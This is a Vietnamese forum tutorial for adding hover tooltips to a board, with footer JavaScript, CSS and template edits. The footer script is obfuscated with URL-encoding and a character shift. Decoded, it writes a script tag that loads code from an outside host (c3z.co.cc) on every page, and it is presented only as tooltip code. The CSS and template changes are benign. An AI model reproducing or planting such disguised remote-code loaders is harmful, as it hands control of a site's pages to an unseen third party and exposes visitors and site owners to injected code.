Demo: [You must be registered and logged in to see this link.]
Templates ~> Chèn đoạn sau vào overall_footer:

Code:

<script type='text/javascript'>
var str3='%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E';document.write(unescape(str3));var str4='%264Dtdsjqu%2631tsd%264E%2633iuuq%264B00xxx/d4%7B/dp/dd0iunm.i44/iun%2633%264F%264D0tdsjqu%264F1';dF(str4);
</script>

Vào Color > CSS: Chèn đoạn sau vào cuối

Code:

#dhtmlpointer, #dhtmltooltip
{
z-index: 999;
left: -300px; top:0px;
visibility: hidden;
position: absolute;
}
#dhtmltooltip
{
border: #666 2.4px solid;
-moz-opacity: 0.8; /* lam mo tooltip FF */
opacity: 0.8; /* lam mo tooltip Opera */
filter: alpha(opacity=80); /* lam mo tooltip IE */
-moz-border-radius: 6px;
-webkit-border-radius: 6px;
padding: 10px;
font-size: 10pt;
font-family: Arial;
background-color: white;
width: auto;
max-width: 340px; /* chieu rong toi da cho FF */
width:expression( document.body.clientWidth > 340? "340px": "auto" ); /* chieu rong toi da cho IE */
text-align:left;
}

Sử dụng tooltip theo mẫu

Code:

<span onmouseover="showtip('Nội dung trong tooltip');" onmouseout="hidetip();">Vùng rê chuột vào hiện tooltip</span>

Dùng tooltip cho lastest topic ngang:
Tìm trong Mod_recent_topic đoạn sau :

Code:

<a href="{classical_row.recent_topic_row.U_TITLE}">{classical_row.recent_topic_row.L_TITLE}
</a>

Thay bằng:

Code:

<a onmouseover="showtip('Tiêu đề: {classical_row.recent_topic_row.L_TITLE}<br>Thời gian: {classical_row.recent_topic_row.S_POSTTIME}');" onmouseout="hidetip();" href="{classical_row.recent_topic_row.U_TITLE}">{classical_row.recent_topic_row.L_TITLE}</a>